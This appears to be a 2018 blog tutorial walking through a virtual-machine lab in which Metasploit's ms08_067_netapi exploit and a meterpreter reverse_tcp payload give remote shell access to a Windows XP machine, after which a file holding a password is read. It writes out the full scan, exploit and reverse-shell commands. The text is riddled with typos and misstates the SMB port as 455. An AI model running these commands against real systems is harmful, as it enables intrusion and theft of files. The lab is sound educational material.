Friday, September 21, 2018

Using Metasploit to remotly access a Windows XP computer and read files.


Scenario 1

A user using Windows XP is unaware of open ports on their system leaving it vulnerable. The victim has a file in his My Documents folder that is sensitive. It is our objective to read in discover the nature of the sensitive information within the file.
Step 1: Starting up our virtual machines
We will assume that the reader has prior knowledge of installing virtual machine software such as Oracle VirtualBox or VMWare and setting up these virtual machines.
We will then create three virtual machines for our scenario the one target machine Metasploitable 2; the Linux: Kali machine that has metasploit framework tool installed; and finally the other Target machine running Windows XP that we will try to exploit.


Figure 1 - Virtual Machines for scinario

Important notice: When running these machines please change the network settings in your Virtual machine software to run these machines on host-only connections. This is important as the machines we are using art vulnerable and allowing them internet connection to an unprotected network will leave us vulnerable to attack.
Once you have started up these three machines you should see the following screens.

Figure 2 - Windows XP tarhet machine with sensitive file on desktop




Figure 3 - Metasploitable 2 running


Figure 4 - Linux Kali with terminal open

Step 2: Finding the IP address of the target
For the following steps we will be entering text commands into the Linux Kali teminal as shown in Figure 4 - Linux Kali with terminal open. By entering the command netdiscover we will be presented with a list of IP addresses.

Figure 5 - List of IP addresses

We have determained that the Targets IP Address is by comparing the known IP addresses to the list and the one that was still unknow was 192.168.152.128 thus this is the IP address of the target. You will want to writ down the targets IP Address for quick access to it.
Step 3: Scan the target ip address for open ports
For this step we enter the following command into our linux terminal nmap -n -sV <Target IP Address> so for this scinario we will be using nmap -n -sV 192.168.152.128 to scan the targets system for any open ports that we can exploit.

Figure 6 - nmap scan for open ports

Now we can see a list of the open ports on the targets system write these down for later use. Note that the target is using Windows XP. This is important for the following step. As we will want to learn what


Step 3: Finding a exploit we can use
For this step we use the command msfconsole this command will the initilise an instance of the metasploitable package and allow us to access metasploit’s functionality. 
In msfconsole (msf>) line tipe the following command 
msf> search platform:"Windows XP SP3" type:exploit This will list the available
exploits.
Doing an internet search and comparing the open ports the availed exploits we see 
that we can use Port 455 combined with exploit/windows/smb/ms08_067_netapi   
Figure 7 - Finding exploit

 We can now inter the exploit/windows/smb/ms08_067_netapi by entering msf> use exploit/windows/smb/ms08_067_netapi Command and then following it up with the show options command to see what we can exploit using this package. 


Figure 8 - List of exploits using package

Step 4: Setup the exploit
This exploit allows us to gain remote access to the targets computer
Now we need to set the RHOST property of metasplot so that it knows which system is being targeted. We do this by using the set RHOST <Target IP Address> command by using the ip address we wrote down earlier we can use set RHOST 192.168.152.128 to set our target.


Figure 9 - Set RHOST target IP Address

Now we need to set the payload that we will be using this is done by using the following command set payload windows/meterpreter/reverse_tcp to see if this worked use the show options command again and see if it lists payload options as follow


Figure 10 - Payload armed

Now we need to set the LHOST and LPORT properties LHOST will be the local linux machines IP we can get this ip from using the ifconfig command in a new terminal in linux for mt instance this ip is  192.168.152.130 so we use set LHOST 192.168.152.130 and set LPORT 6666
Now we launch the exploit by injecting our reverse shell “meterpreter” into the open port by using the exploit command to exploit the vulnatable target system. You will know it was successful when you see the following screen


Figure 11 - Exploit launched meterpreter reverse shell running

Step 5: Using meterpreter post exploitation
For our scinario our goal is to find a text document on the target’s desktop that contains sensitive information such as a password.
Now by using meterpreter we can navigate the targets filesystem. By entering the command Shell we enter the native Windows XP command prompt we then navigate to the usets my documets using the cd c:\Documents and Settings\Administrator\My Documents command and use the DIR Command to see a list of the files int the users Documents. We spot a text file named Sensitive_File.txt in the users documents and decide to investigate this file


Figure 12 - Brows target's file system


Figure 13 - Targets's My Documents.

To read the contents of Sensitive_File.txt we can use the command more Sensitive_File.txt  and we have discovered a password the user has for some missile system.


Figure 14 - Using more command



Figure 15 - Target machine viewing the file

-

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Common practices to reduce your system's vulnerabilities.

  Run regular vulnerability scans – it is recommended that you run a high level scan on your system at least once a month.   Regularly ...